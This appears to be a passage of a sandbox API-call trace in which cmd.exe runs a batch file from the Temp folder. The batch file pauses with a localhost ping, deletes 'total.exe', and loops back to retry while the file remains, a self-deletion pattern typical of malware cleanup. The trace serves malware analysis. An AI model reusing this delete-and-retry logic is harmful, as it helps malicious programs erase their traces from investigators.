(hFile=0x7) returned 0x2 [0160.727] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0160.727] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3ff0a4 | out: lpMode=0x3ff0a4) returned 1 [0160.727] _get_osfhandle (_FileHandle=1) returned 0x7 [0160.727] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x781140*, nNumberOfCharsToWrite=0x4, lpNumberOfCharsWritten=0x3ff0d0, lpReserved=0x0 | out: lpBuffer=0x781140*, lpNumberOfCharsWritten=0x3ff0d0*=0x4) returned 1 [0160.727] _vsnwprintf (in: _Buffer=0x4ac44640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x3ff0dc | out: _Buffer=" localhost -n 2 ") returned 17 [0160.727] _get_osfhandle (_FileHandle=1) returned 0x7 [0160.727] GetFileType (hFile=0x7) returned 0x2 [0160.727] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0160.727] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3ff09c | out: lpMode=0x3ff09c) returned 1 [0160.728] _get_osfhandle (_FileHandle=1) returned 0x7 [0160.728] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4ac44640*, nNumberOfCharsToWrite=0x11, lpNumberOfCharsWritten=0x3ff0c8, lpReserved=0x0 | out: lpBuffer=0x4ac44640*, 
lpNumberOfCharsWritten=0x3ff0c8*=0x11) returned 1 [0160.728] _vsnwprintf (in: _Buffer=0x4ac44640, _BufferCount=0x1fff, _Format="%c%c", _ArgList=0x3ff0c8 | out: _Buffer="1>") returned 2 [0160.728] _get_osfhandle (_FileHandle=1) returned 0x7 [0160.728] GetFileType (hFile=0x7) returned 0x2 [0160.728] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0160.728] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3ff088 | out: lpMode=0x3ff088) returned 1 [0160.728] _get_osfhandle (_FileHandle=1) returned 0x7 [0160.728] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4ac44640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x3ff0b4, lpReserved=0x0 | out: lpBuffer=0x4ac44640*, lpNumberOfCharsWritten=0x3ff0b4*=0x2) returned 1 [0160.729] _vsnwprintf (in: _Buffer=0x4ac44640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x3ff0cc | out: _Buffer="NUL ") returned 4 [0160.729] _get_osfhandle (_FileHandle=1) returned 0x7 [0160.729] GetFileType (hFile=0x7) returned 0x2 [0160.729] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0160.729] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3ff08c | out: lpMode=0x3ff08c) returned 1 [0160.729] _get_osfhandle (_FileHandle=1) returned 0x7 [0160.729] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4ac44640*, nNumberOfCharsToWrite=0x4, lpNumberOfCharsWritten=0x3ff0b8, lpReserved=0x0 | out: lpBuffer=0x4ac44640*, lpNumberOfCharsWritten=0x3ff0b8*=0x4) returned 1 [0160.729] _vsnwprintf (in: _Buffer=0x4ac44640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x3ff0fc | out: _Buffer="\r\n") returned 2 [0160.729] _get_osfhandle (_FileHandle=1) returned 0x7 [0160.729] GetFileType (hFile=0x7) returned 0x2 [0160.730] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0160.730] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3ff0bc | out: lpMode=0x3ff0bc) returned 1 [0160.730] _get_osfhandle (_FileHandle=1) returned 0x7 [0160.730] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4ac44640*, nNumberOfCharsToWrite=0x2, 
lpNumberOfCharsWritten=0x3ff0e8, lpReserved=0x0 | out: lpBuffer=0x4ac44640*, lpNumberOfCharsWritten=0x3ff0e8*=0x2) returned 1 [0160.730] _wcsicmp (_String1="ping", _String2="DIR") returned 12 [0160.730] _wcsicmp (_String1="ping", _String2="ERASE") returned 11 [0160.730] _wcsicmp (_String1="ping", _String2="DEL") returned 12 [0160.730] _wcsicmp (_String1="ping", _String2="TYPE") returned -4 [0160.730] _wcsicmp (_String1="ping", _String2="COPY") returned 13 [0160.730] _wcsicmp (_String1="ping", _String2="CD") returned 13 [0160.730] _wcsicmp (_String1="ping", _String2="CHDIR") returned 13 [0160.730] _wcsicmp (_String1="ping", _String2="RENAME") returned -2 [0160.730] _wcsicmp (_String1="ping", _String2="REN") returned -2 [0160.730] _wcsicmp (_String1="ping", _String2="ECHO") returned 11 [0160.730] _wcsicmp (_String1="ping", _String2="SET") returned -3 [0160.730] _wcsicmp (_String1="ping", _String2="PAUSE") returned 8 [0160.730] _wcsicmp (_String1="ping", _String2="DATE") returned 12 [0160.730] _wcsicmp (_String1="ping", _String2="TIME") returned -4 [0160.730] _wcsicmp (_String1="ping", _String2="PROMPT") returned -9 [0160.730] _wcsicmp (_String1="ping", _String2="MD") returned 3 [0160.730] _wcsicmp (_String1="ping", _String2="MKDIR") returned 3 [0160.730] _wcsicmp (_String1="ping", _String2="RD") returned -2 [0160.730] _wcsicmp (_String1="ping", _String2="RMDIR") returned -2 [0160.730] _wcsicmp (_String1="ping", _String2="PATH") returned 8 [0160.731] _wcsicmp (_String1="ping", _String2="GOTO") returned 9 [0160.731] _wcsicmp (_String1="ping", _String2="SHIFT") returned -3 [0160.731] _wcsicmp (_String1="ping", _String2="CLS") returned 13 [0160.731] _wcsicmp (_String1="ping", _String2="CALL") returned 13 [0160.731] _wcsicmp (_String1="ping", _String2="VERIFY") returned -6 [0160.731] _wcsicmp (_String1="ping", _String2="VER") returned -6 [0160.731] _wcsicmp (_String1="ping", _String2="VOL") returned -6 [0160.731] _wcsicmp (_String1="ping", _String2="EXIT") returned 11 
[0160.731] _wcsicmp (_String1="ping", _String2="SETLOCAL") returned -3 [0160.731] _wcsicmp (_String1="ping", _String2="ENDLOCAL") returned 11 [0160.731] _wcsicmp (_String1="ping", _String2="TITLE") returned -4 [0160.731] _wcsicmp (_String1="ping", _String2="START") returned -3 [0160.731] _wcsicmp (_String1="ping", _String2="DPATH") returned 12 [0160.731] _wcsicmp (_String1="ping", _String2="KEYS") returned 5 [0160.731] _wcsicmp (_String1="ping", _String2="MOVE") returned 3 [0160.731] _wcsicmp (_String1="ping", _String2="PUSHD") returned -12 [0160.731] _wcsicmp (_String1="ping", _String2="POPD") returned -6 [0160.731] _wcsicmp (_String1="ping", _String2="ASSOC") returned 15 [0160.731] _wcsicmp (_String1="ping", _String2="FTYPE") returned 10 [0160.731] _wcsicmp (_String1="ping", _String2="BREAK") returned 14 [0160.731] _wcsicmp (_String1="ping", _String2="COLOR") returned 13 [0160.731] _wcsicmp (_String1="ping", _String2="MKLINK") returned 3 [0160.731] _wcsnicmp (_String1="ping", _String2="cmd ", _MaxCount=0x4) returned 13 [0160.731] SetErrorMode (uMode=0x0) returned 0x8001 [0160.732] SetErrorMode (uMode=0x1) returned 0x0 [0160.732] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x792758, lpFilePart=0x3feea0 | out: lpBuffer="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp", lpFilePart=0x3feea0*="Temp") returned 0x24 [0160.732] SetErrorMode (uMode=0x8001) returned 0x1 [0160.732] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4ac40640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0160.732] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0160.733] _get_osfhandle (_FileHandle=1) returned 0x7 [0160.733] _get_osfhandle (_FileHandle=1) returned 0x7 [0160.733] _get_osfhandle (_FileHandle=1) returned 0x7 [0160.733] GetFileType (hFile=0x7) returned 0x2 [0160.733] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0160.733] 
GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3fee6c | out: lpMode=0x3fee6c) returned 1 [0160.733] _dup (_FileHandle=1) returned 3 [0160.734] _close (_FileHandle=1) returned 0 [0160.735] _wcsicmp (_String1="NUL", _String2="con") returned 11 [0160.735] CreateFileW (lpFileName="NUL" (normalized: "\\device\\null"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x3fee3c, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x78 [0160.735] _open_osfhandle (_OSFileHandle=0x78, _Flags=8) returned 1 [0160.735] GetConsoleTitleW (in: lpConsoleTitle=0x3fec6c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0160.736] GetStartupInfoW (in: lpStartupInfo=0x3fe844 | out: lpStartupInfo=0x3fe844*(cb=0x44, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0160.787] CloseHandle (hObject=0x74) returned 1 [0160.787] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0160.787] GetEnvironmentStringsW () returned 0x795b38* [0160.787] FreeEnvironmentStringsW (penv=0x795b38) returned 1 [0160.787] WaitForSingleObject (hHandle=0x7c, dwMilliseconds=0xffffffff) returned 0x0 [0164.997] GetExitCodeProcess (in: hProcess=0x7c, lpExitCode=0x3fe824 | out: lpExitCode=0x3fe824*=0x0) returned 1 [0164.997] CloseHandle (hObject=0x7c) returned 1 [0164.998] _vsnwprintf (in: _Buffer=0x3fe96c, _BufferCount=0x13, _Format="%08X", _ArgList=0x3fe830 | out: _Buffer="00000000") returned 8 [0164.998] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0164.998] GetEnvironmentStringsW () returned 0x794f78* [0164.998] FreeEnvironmentStringsW (penv=0x794f78) returned 1 [0164.998] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) 
returned 1 [0164.998] GetEnvironmentStringsW () returned 0x794f78* [0164.998] FreeEnvironmentStringsW (penv=0x794f78) returned 1 [0164.998] DeleteProcThreadAttributeList (in: lpAttributeList=0x3fe888 | out: lpAttributeList=0x3fe888) [0164.998] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0164.999] _close (_FileHandle=3) returned 0 [0164.999] _get_osfhandle (_FileHandle=1) returned 0x7 [0164.999] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0164.999] _get_osfhandle (_FileHandle=1) returned 0x7 [0164.999] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4ac341ac | out: lpMode=0x4ac341ac) returned 1 [0164.999] _get_osfhandle (_FileHandle=0) returned 0x3 [0164.999] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4ac341b0 | out: lpMode=0x4ac341b0) returned 1 [0165.000] SetConsoleInputExeNameW () returned 0x1 [0165.000] GetConsoleOutputCP () returned 0x1b5 [0165.000] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4ac34260 | out: lpCPInfo=0x4ac34260) returned 1 [0165.000] SetThreadUILanguage (LangId=0x0) returned 0x409 [0165.000] CreateFileW (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\1.bat" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\1.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3ff0a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x78 [0165.000] _open_osfhandle (_OSFileHandle=0x78, _Flags=8) returned 3 [0165.000] _get_osfhandle (_FileHandle=3) returned 0x78 [0165.000] SetFilePointer (in: hFile=0x78, lDistanceToMove=32, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x20 [0165.001] _get_osfhandle (_FileHandle=3) returned 0x78 [0165.001] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x20 [0165.001] ReadFile (in: hFile=0x78, lpBuffer=0x4ac36640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3ff088, lpOverlapped=0x0 | out: 
lpBuffer=0x4ac36640*, lpNumberOfBytesRead=0x3ff088*=0xa6, lpOverlapped=0x0) returned 1 [0165.002] SetFilePointer (in: hFile=0x78, lDistanceToMove=84, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x54 [0165.002] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ac36640, cbMultiByte=52, lpWideCharStr=0x4ac3c640, cchWideChar=8191 | out: lpWideCharStr="del C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\total.exe\r\n") returned 52 [0165.003] _tell (_FileHandle=3) returned 84 [0165.003] _close (_FileHandle=3) returned 0 [0165.003] _vsnwprintf (in: _Buffer=0x4ac44640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x3fee5c | out: _Buffer="\r\n") returned 2 [0165.003] _get_osfhandle (_FileHandle=1) returned 0x7 [0165.003] GetFileType (hFile=0x7) returned 0x2 [0165.004] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0165.004] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3fee1c | out: lpMode=0x3fee1c) returned 1 [0165.004] _get_osfhandle (_FileHandle=1) returned 0x7 [0165.004] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4ac44640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x3fee48, lpReserved=0x0 | out: lpBuffer=0x4ac44640*, lpNumberOfCharsWritten=0x3fee48*=0x2) returned 1 [0165.004] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4ac40640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0165.004] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4ac35260 | out: lpBuffer="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp") returned 0x24 [0165.004] _vsnwprintf (in: _Buffer=0x4ac35e40, _BufferCount=0x3fe, _Format="%s", _ArgList=0x3fee58 | out: _Buffer="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp") returned 36 [0165.004] _vsnwprintf (in: _Buffer=0x4ac35e88, _BufferCount=0x3da, _Format="%c", _ArgList=0x3fee58 | out: _Buffer=">") returned 1 [0165.004] _get_osfhandle (_FileHandle=1) returned 0x7 [0165.004] GetFileType (hFile=0x7) returned 0x2 [0165.005] GetStdHandle (nStdHandle=0xfffffff5) 
returned 0x7 [0165.005] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3fee20 | out: lpMode=0x3fee20) returned 1 [0165.005] _get_osfhandle (_FileHandle=1) returned 0x7 [0165.005] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4ac35e40*, nNumberOfCharsToWrite=0x25, lpNumberOfCharsWritten=0x3fee4c, lpReserved=0x0 | out: lpBuffer=0x4ac35e40*, lpNumberOfCharsWritten=0x3fee4c*=0x25) returned 1 [0165.005] _get_osfhandle (_FileHandle=1) returned 0x7 [0165.005] GetFileType (hFile=0x7) returned 0x2 [0165.005] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0165.005] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3ff0a4 | out: lpMode=0x3ff0a4) returned 1 [0165.006] _get_osfhandle (_FileHandle=1) returned 0x7 [0165.006] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x792348*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0x3ff0d0, lpReserved=0x0 | out: lpBuffer=0x792348*, lpNumberOfCharsWritten=0x3ff0d0*=0x3) returned 1 [0165.006] _vsnwprintf (in: _Buffer=0x4ac44640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x3ff0dc | out: _Buffer=" C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\total.exe ") returned 48 [0165.006] _get_osfhandle (_FileHandle=1) returned 0x7 [0165.006] GetFileType (hFile=0x7) returned 0x2 [0165.006] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0165.006] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3ff09c | out: lpMode=0x3ff09c) returned 1 [0165.006] _get_osfhandle (_FileHandle=1) returned 0x7 [0165.006] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4ac44640*, nNumberOfCharsToWrite=0x30, lpNumberOfCharsWritten=0x3ff0c8, lpReserved=0x0 | out: lpBuffer=0x4ac44640*, lpNumberOfCharsWritten=0x3ff0c8*=0x30) returned 1 [0165.007] _vsnwprintf (in: _Buffer=0x4ac44640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x3ff0fc | out: _Buffer="\r\n") returned 2 [0165.007] _get_osfhandle (_FileHandle=1) returned 0x7 [0165.007] GetFileType (hFile=0x7) returned 0x2 [0165.007] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0165.007] 
GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3ff0bc | out: lpMode=0x3ff0bc) returned 1 [0165.007] _get_osfhandle (_FileHandle=1) returned 0x7 [0165.007] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4ac44640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x3ff0e8, lpReserved=0x0 | out: lpBuffer=0x4ac44640*, lpNumberOfCharsWritten=0x3ff0e8*=0x2) returned 1 [0165.007] _wcsicmp (_String1="del", _String2="DIR") returned -4 [0165.007] _wcsicmp (_String1="del", _String2="ERASE") returned -1 [0165.007] _wcsicmp (_String1="del", _String2="DEL") returned 0 [0165.007] GetConsoleTitleW (in: lpConsoleTitle=0x3fec6c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0165.008] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x3fdce4, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x3fdce8, nFileSystemNameSize=0x106 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x3fdce4*=0xff, lpFileSystemFlags=0x0, lpFileSystemNameBuffer="NTFS") returned 1 [0165.008] _wcsicmp (_String1="NTFS", _String2="FAT") returned 8 [0165.008] _wcsicmp (_String1="total.exe", _String2=".") returned 70 [0165.008] _wcsicmp (_String1="total.exe", _String2="..") returned 70 [0165.008] GetFileAttributesW (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\total.exe" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe")) returned 0x2020 [0165.009] DeleteFileW (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\total.exe" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe")) returned 1 [0165.009] FindNextFileW (in: hFindFile=0x793908, lpFindFileData=0x798704 | out: lpFindFileData=0x798704) returned 0 [0165.010] GetLastError () returned 0x12 [0165.010] FindClose (in: hFindFile=0x793908 | out: hFindFile=0x793908) returned 1 [0165.010] _get_osfhandle (_FileHandle=1) returned 0x7 [0165.010] SetConsoleMode 
(hConsoleHandle=0x7, dwMode=0x3) returned 1 [0165.011] _get_osfhandle (_FileHandle=1) returned 0x7 [0165.011] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4ac341ac | out: lpMode=0x4ac341ac) returned 1 [0165.011] _get_osfhandle (_FileHandle=0) returned 0x3 [0165.011] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4ac341b0 | out: lpMode=0x4ac341b0) returned 1 [0165.011] SetConsoleInputExeNameW () returned 0x1 [0165.011] GetConsoleOutputCP () returned 0x1b5 [0165.011] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4ac34260 | out: lpCPInfo=0x4ac34260) returned 1 [0165.011] SetThreadUILanguage (LangId=0x0) returned 0x409 [0165.011] CreateFileW (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\1.bat" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\1.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3ff0a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x78 [0165.012] _open_osfhandle (_OSFileHandle=0x78, _Flags=8) returned 3 [0165.012] _get_osfhandle (_FileHandle=3) returned 0x78 [0165.012] SetFilePointer (in: hFile=0x78, lDistanceToMove=84, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x54 [0165.012] _get_osfhandle (_FileHandle=3) returned 0x78 [0165.012] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x54 [0165.012] ReadFile (in: hFile=0x78, lpBuffer=0x4ac36640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3ff088, lpOverlapped=0x0 | out: lpBuffer=0x4ac36640*, lpNumberOfBytesRead=0x3ff088*=0x72, lpOverlapped=0x0) returned 1 [0165.012] SetFilePointer (in: hFile=0x78, lDistanceToMove=150, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x96 [0165.012] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ac36640, cbMultiByte=66, lpWideCharStr=0x4ac3c640, cchWideChar=8191 | out: lpWideCharStr="if exist 
C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\total.exe goto try\r\n") returned 66 [0165.014] _tell (_FileHandle=3) returned 150 [0165.014] _close (_FileHandle=3) returned 0 [0165.014] _vsnwprintf (in: _Buffer=0x4ac44640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x3fee5c | out: _Buffer="\r\n") returned 2 [0165.014] _get_osfhandle (_FileHandle=1) returned 0x7 [0165.014] GetFileType (hFile=0x7) returned 0x2 [0165.015] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0165.015] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3fee1c | out: lpMode=0x3fee1c) returned 1 [0165.015] _get_osfhandle (_FileHandle=1) returned 0x7 [0165.015] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4ac44640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x3fee48, lpReserved=0x0 | out: lpBuffer=0x4ac44640*, lpNumberOfCharsWritten=0x3fee48*=0x2) returned 1 [0165.015] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4ac35260 | out: lpBuffer="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp") returned 0x24 [0165.015] _vsnwprintf (in: _Buffer=0x4ac35e40, _BufferCount=0x3fe, _Format="%s", _ArgList=0x3fee58 | out: _Buffer="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp") returned 36 [0165.015] _vsnwprintf (in: _Buffer=0x4ac35e88, _BufferCount=0x3da, _Format="%c", _ArgList=0x3fee58 | out: _Buffer=">") returned 1 [0165.015] _get_osfhandle (_FileHandle=1) returned 0x7 [0165.015] GetFileType (hFile=0x7) returned 0x2 [0165.016] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0165.016] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3fee20 | out: lpMode=0x3fee20) returned 1 [0165.016] _get_osfhandle (_FileHandle=1) returned 0x7 [0165.016] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4ac35e40*, nNumberOfCharsToWrite=0x25, lpNumberOfCharsWritten=0x3fee4c, lpReserved=0x0 | out: lpBuffer=0x4ac35e40*, lpNumberOfCharsWritten=0x3fee4c*=0x25) returned 1 [0165.016] _vsnwprintf (in: _Buffer=0x4ac44640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x3ff0dc | out: _Buffer="if ") returned 3 
[0165.016] _get_osfhandle (_FileHandle=1) returned 0x7 [0165.016] GetFileType (hFile=0x7) returned 0x2 [0165.016] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0165.016] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3ff09c | out: lpMode=0x3ff09c) returned 1 [0165.017] _get_osfhandle (_FileHandle=1) returned 0x7 [0165.017] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4ac44640*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0x3ff0c8, lpReserved=0x0 | out: lpBuffer=0x4ac44640*, lpNumberOfCharsWritten=0x3ff0c8*=0x3) returned 1 [0165.017] _vsnwprintf (in: _Buffer=0x4ac44640, _BufferCount=0x1fff, _Format="%s %s ", _ArgList=0x3ff0bc | out: _Buffer="exist C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\total.exe ") returned 53 [0165.017] _get_osfhandle (_FileHandle=1) returned 0x7 [0165.017] GetFileType (hFile=0x7) returned 0x2 [0165.017] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0165.017] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3ff07c | out: lpMode=0x3ff07c) returned 1 [0165.017] _get_osfhandle (_FileHandle=1) returned 0x7 [0165.017] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4ac44640*, nNumberOfCharsToWrite=0x35, lpNumberOfCharsWritten=0x3ff0a8, lpReserved=0x0 | out: lpBuffer=0x4ac44640*, lpNumberOfCharsWritten=0x3ff0a8*=0x35) returned 1 [0165.018] _get_osfhandle (_FileHandle=1) returned 0x7 [0165.018] GetFileType (hFile=0x7) returned 0x2 [0165.018] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0165.018] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3ff088 | out: lpMode=0x3ff088) returned 1 [0165.018] _get_osfhandle (_FileHandle=1) returned 0x7 [0165.018] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x7933a8*, nNumberOfCharsToWrite=0x4, lpNumberOfCharsWritten=0x3ff0b4, lpReserved=0x0 | out: lpBuffer=0x7933a8*, lpNumberOfCharsWritten=0x3ff0b4*=0x4) returned 1 [0165.018] _vsnwprintf (in: _Buffer=0x4ac44640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x3ff0c0 | out: _Buffer=" try ") returned 5 [0165.018] _get_osfhandle 
(_FileHandle=1) returned 0x7 [0165.018] GetFileType (hFile=0x7) returned 0x2 [0165.019] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0165.019] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3ff080 | out: lpMode=0x3ff080) returned 1 [0165.019] _get_osfhandle (_FileHandle=1) returned 0x7 [0165.019] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4ac44640*, nNumberOfCharsToWrite=0x5, lpNumberOfCharsWritten=0x3ff0ac, lpReserved=0x0 | out: lpBuffer=0x4ac44640*, lpNumberOfCharsWritten=0x3ff0ac*=0x5) returned 1 [0165.020] _vsnwprintf (in: _Buffer=0x4ac44640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x3ff0fc | out: _Buffer="\r\n") returned 2 [0165.020] _get_osfhandle (_FileHandle=1) returned 0x7 [0165.020] GetFileType (hFile=0x7) returned 0x2 [0165.020] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0165.020] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3ff0bc | out: lpMode=0x3ff0bc) returned 1 [0165.020] _get_osfhandle (_FileHandle=1) returned 0x7 [0165.020] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4ac44640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x3ff0e8, lpReserved=0x0 | out: lpBuffer=0x4ac44640*, lpNumberOfCharsWritten=0x3ff0e8*=0x2) returned 1 [0165.021] wcsncmp (_String1="C:\\U", _String2="\\\\.\\", _MaxCount=0x4) returned -25 [0165.021] FindFirstFileExW (in: lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\total.exe", fInfoLevelId=0x1, lpFindFileData=0x3fea14, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3fea14) returned 0xffffffff [0165.021] GetLastError () returned 0x2 [0165.021] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0165.021] GetLastError () returned 0x6 [0165.021] _get_osfhandle (_FileHandle=1) returned 0x7 [0165.021] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0165.021] _get_osfhandle (_FileHandle=1) returned 0x7 [0165.021] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4ac341ac | out: lpMode=0x4ac341ac) returned 1 
